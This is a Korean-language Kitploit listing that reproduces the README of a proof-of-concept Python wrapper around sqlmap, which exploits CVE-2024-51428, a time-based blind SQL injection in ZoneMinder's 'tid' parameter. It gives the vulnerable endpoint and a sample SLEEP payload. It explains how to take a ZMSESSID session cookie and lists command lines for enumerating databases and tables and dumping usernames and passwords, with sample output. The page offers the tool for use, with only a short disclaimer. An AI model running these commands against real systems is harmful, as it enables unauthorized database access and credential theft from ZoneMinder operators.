Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-51428-PoC — ZoneMinder의 CVE-2024-51428을 sqlmap을 사용한 블라인드 SQL 인젝션으로 공격하는 Python 래퍼로, DB 및 테이블 열거와 데이터 추출을 자동화하고 깔끔한 출력을 제공합니다. | Kitploit
도구/GitHubGitHub/d1se0/cve-2024-51428-poc
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

ZoneMinder의 CVE-2024-51428을 sqlmap을 사용한 블라인드 SQL 인젝션으로 공격하는 Python 래퍼로, DB 및 테이블 열거와 데이터 추출을 자동화하고 깔끔한 출력을 제공합니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-51428 - ZoneMinder 블라인드 SQL 인젝션 PoC

ZoneMinder의 CVE-2024-51428을 악용하도록 설계된 sqlmap용 Python 래퍼입니다.
이 도구는 블라인드 SQL 인젝션(Blind SQL Injection) 취약점의 탐지와 악용을 자동화하면서, 출력을 깔끔하게 유지하고 유용한 데이터에 집중합니다.

이 스크립트는 sqlmap 로그를 숨기고 다음과 같은 관련 정보만 표시합니다:

  • 탐지된 인젝션 지점
  • 데이터베이스 이름
  • 테이블
  • 덤프된 자격 증명 또는 민감한 데이터

따라서 이 도구는 CTF 환경, 데모, 보안 테스트에 적합합니다.


취약점 개요

CVE: CVE-2024-51428
유형: 블라인드 SQL 인젝션
영향을 받는 소프트웨어: ZoneMinder
공격 벡터: HTTP GET 파라미터
파라미터: tid

취약점은 다음 엔드포인트에 존재합니다:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

tid 파라미터는 데이터베이스 쿼리에 사용되기 전에 제대로 검증되지 않아, 공격자가 SQL 쿼리를 주입할 수 있습니다.

사용된 악용 기법은 시간 기반 블라인드 SQL 인젝션입니다.

sqlmap이 발견한 예시 페이로드:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

이 페이로드는 쿼리가 성공적으로 실행되면 데이터베이스를 강제로 SLEEP 상태로 만들어 SQL 인젝션의 존재를 확인합니다.


기능

  • 자동 블라인드 SQL 인젝션 탐지
  • 데이터베이스 열거
  • 테이블 열거
  • 테이블 덤프
  • 컬럼 필터링
  • 행 필터링
  • 깔끔한 출력(sqlmap 로그 숨김)
  • CTF 및 침투 테스트 랩용으로 설계

요구 사항

  • Python 3
  • sqlmap

필요한 경우 sqlmap을 설치하세요:

root@kitploit:~
sudo apt install sqlmap

사용법

기본 구문:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

이 명령으로 취약한지 여부를 확인합니다

예시:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

필요한 쿠키 얻기

이 익스플로잇에는 유효한 ZoneMinder 세션 쿠키가 필요합니다.

단계:

  1. 브라우저에서 대상(target)을 엽니다
  2. 개발자 도구(Developer Tools)를 엽니다
  3. 다음으로 이동합니다:
root@kitploit:~
Application → Cookies
  1. 다음 이름의 쿠키를 찾습니다:
root@kitploit:~
ZMSESSID
  1. 값을 복사하여 -c와 함께 사용합니다

예시:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

대상이 취약한지 확인하기

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

예시 출력:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

데이터베이스 열거

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

예시 출력:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

테이블 열거

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

예시 출력:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

테이블 덤프

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

특정 컬럼 덤프

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

예시:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

행 필터링(WHERE 절)

다음을 사용하여 행을 필터링할 수 있습니다:

root@kitploit:~
-ff <COLUMN> <VALUE>

예시:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

동등한 SQL:

root@kitploit:~
WHERE Username='mark'

특정 사용자의 비밀번호 덤프

예시:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

내부적으로 실행되는 sqlmap 명령:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

도구 작동 방식

이 스크립트는 sqlmap을 감싸는 래퍼 역할을 합니다.

내부적으로 수행되는 단계:

  1. 취약한 엔드포인트를 구성합니다
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. 인증 쿠키를 sqlmap에 전달합니다
  2. 최적화된 옵션으로 sqlmap을 실행합니다:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. sqlmap 출력을 실시간으로 파싱합니다
  2. 로그를 필터링하고 다음만 표시합니다:
  • 인젝션 정보
  • 데이터베이스
  • 테이블
  • 덤프된 데이터

의도된 용도

이 도구는 다음을 위해 제작되었습니다:

  • CTF(Capture The Flag) 챌린지
  • 보안 연구
  • 교육 목적
  • 침투 테스트 랩

면책 조항

이 프로젝트는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다.

저자는 이 도구의 오용에 대해 책임을 지지 않습니다.

어떤 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오.


저자

보안 연구 / CTF 도구

도구 다운로드